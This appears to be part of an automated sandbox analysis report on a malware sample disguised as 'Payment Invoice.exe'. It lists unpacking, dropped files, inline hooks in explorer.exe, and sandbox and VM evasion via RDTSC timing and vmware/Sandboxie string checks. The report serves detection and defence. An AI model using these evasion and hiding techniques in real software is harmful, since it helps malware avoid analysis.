                      Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmp
                      Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.750469066.0000000005A00000.00000002.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: Payment Invoice.exe, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: Payment Invoice.exe.1.dr, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.Payment Invoice.exe.4e0000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.2.Payment Invoice.exe.4e0000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 13.0.Payment Invoice.exe.140000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 13.2.Payment Invoice.exe.140000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 14.0.Payment Invoice.exe.c20000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 14.2.Payment Invoice.exe.c20000.1.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Yara detected Costura Assembly LoaderShow sources
                      Source: Yara matchFile source: Payment Invoice.exe, type: SAMPLE
                      Source: Yara matchFile source: 00000001.00000002.716578799.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.714247594.0000000000142000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.909529703.00000000007AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912797173.0000000003BEF000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.715166926.0000000000C22000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.720423226.00000000029B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.712145494.0000000007311000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000000.713411338.0000000000142000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.781781512.0000000000C22000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.640844843.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: WWAHost.exe PID: 6992, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Payment Invoice.exe PID: 6744, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Payment Invoice.exe PID: 6948, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Payment Invoice.exe PID: 6860, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe, type: DROPPED
                      Source: Yara matchFile source: 21.2.WWAHost.exe.3bef834.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.Payment Invoice.exe.c20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.WWAHost.exe.3bef834.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.0.Payment Invoice.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Payment Invoice.exe.c20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Payment Invoice.exe.4e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Payment Invoice.exe.4e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.Payment Invoice.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E174C7 push es; iretd
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E1D0FF push ecx; iretd
                      Source: C:\Users\user\Desktop\Payment Invoice.exeCode function: 1_2_06E1D16B push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041D0D2 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041D0DB push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041D085 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041D13C push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00416A40 pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0040E24A push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0040E250 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00418DCD push edi; retf
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0041659D push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0171D0D1 push ecx; ret
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0373D0D1 push ecx; ret
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E46A40 pushad ; retf
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E3E24A push es; iretd
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E3E250 push es; iretd
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4D0D2 push eax; ret
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4D0DB push eax; ret
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4D085 push eax; ret
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4D13C push eax; ret
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E48DCD push edi; retf
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_02E4659D push edi; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.98286833797
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.98286833797
                      Source: C:\Users\user\Desktop\Payment Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE2
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: Payment Invoice.exe, 00000001.00000002.720684926.0000000002A45000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLDSELECT * FROM WIN32_COMPUTERSYSTEM
                      Tries to detect virtualization through RDTSC time measurementsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                      Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000002E398E4 second address: 0000000002E398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                      Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000002E39B4E second address: 0000000002E39B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00409A80 rdtsc
                      Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4558
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1897
                      Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 6904Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6952Thread sleep count: 4558 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944Thread sleep count: 1897 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6924Thread sleep count: 43 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 1568Thread sleep time: -36000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: powershell.exe, 0000000B.00000003.814222744.0000000005741000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                      Source: explorer.exe, 0000000F.00000002.921338058.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: explorer.exe, 0000000F.00000000.757463249.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Payment Invoice.exe, 00000001.00000002.720684926.0000000002A45000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: powershell.exe, 0000000B.00000003.814222744.0000000005741000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
